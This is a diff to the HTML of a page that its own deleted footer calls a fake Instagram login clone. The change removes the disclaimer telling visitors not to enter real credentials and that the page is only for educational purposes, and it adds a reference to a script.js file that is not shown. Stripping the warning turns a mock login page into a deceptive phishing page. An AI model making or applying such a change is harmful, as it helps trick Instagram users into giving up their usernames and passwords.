--- a/index.html
+++ b/index.html
@@ -45,11 +45,10 @@
 
     <br />
     <div style="position:fixed;left:0;bottom:0;width:100%; color: #7e7979;">
-        <p style="text-align:center;"> Disclaimer this is not a real "instagram.com" page, please do not enter
-            your real username and password, it's only for educational purposes.</p>
+        
     </div>
     <br />
-
+ <script src="script.js"></script> 
 </body>
 
 </html>
